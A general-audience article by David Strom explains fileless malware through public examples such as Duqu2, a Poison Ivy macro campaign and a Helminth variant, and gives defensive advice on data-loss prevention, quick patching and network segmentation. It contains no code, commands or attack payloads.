Most of the time, when malware invades your network it leaves something behind: a set of files, an executable program that is disguised inside a Word document or a PDF, or something else. While it is great that the detection programs have gotten better at finding these pieces of evidence and stopping them from harming your infrastructure, the bad guys have also figured out ways around being detected.
What if malware could do its dirty work without leaving anything behind? That is where this kind of “fileless” malware comes into play. In March Carbon Black released a study among security researchers that showed that close to two-thirds of them have seen an increase in non-malware attacks since the beginning of 2016. And indications are things are only going to get worse.
The fileless designation is somewhat misleading, since you still need something stored in memory on the target machine. Nevertheless, there are several different fileless approaches. One is to just simply cover your tracks. This what the fileless malware family called Duqu2 does. As posted on Securelist, it evades detection by removing the MSI package that was initially used to infect the endpoint. What is left is just running in memory, at least until a PC is rebooted.
Another idea is to gather small bits of code that is already written and memory-resident into a coherent attack. Because it repurposes code that is already in use, it is a lot more dangerous and very difficult to detect and to prevent. This is called return-oriented programming. The malware can execute standard DLLs and other executable sequences of code that can compromise an otherwise uninfected system. This means that apps themselves – even ones that have been carefully crafted -- can be a threat.
This could take the form of using in-memory PowerShell commands, hide inside Word macros or leverage the macro code to do damage to your systems. FireEye researchers recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Word document may have been infected with Poison Ivy, a popular remote access tool that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more. The attack used fileless execution to operate exclusively in memory and makes use of decoy documents. It also tries to evade Windows’ AppLocker protections, again making it harder to detect.
Another example of these types of attacks was found by security researchers from an attack earlier this year in Israel. The malware installed a fileless variant of the Helminth Trojan agent. While Microsoft released the patch for this vulnerability in April, the attackers based their attack on an existing proof-of-concept method that was published by researchers after the patch was released.
So what are IT managers to do to try to fight fileless attacks? First, use DLP products such as those available from iboss, since often a typical action once malware is detonated is to steal data and move it outside the corporate network. The quicker you know sensitive data is leaving your network, the quicker you can respond to the attack.
Second, patch quickly. Some of these exploits were designed to take place soon after vulnerabilities were discovered but before patches were put into general circulation. Look for embedded systems that are running ancient OSs or applications that require use of outdated browser versions.
Finally, review your network isolation policies and setup. Make use of vLANs and internal firewalls to block network traffic that originates internally, because it could be a threat.
David Strom is one of the leading experts on network and Internet technologies and has written and spoken extensively on topics such as VOIP, convergence, email, cloud computing, network management, Internet applications, wireless and Web services for more than 25 years. He has had several editorial management positions for both print and online properties and currently writes for Dice, Techtarget's SearchSecurity.com, ITworld.com and Network World. Find him on Twitter @dstrom and on his website strominator.com.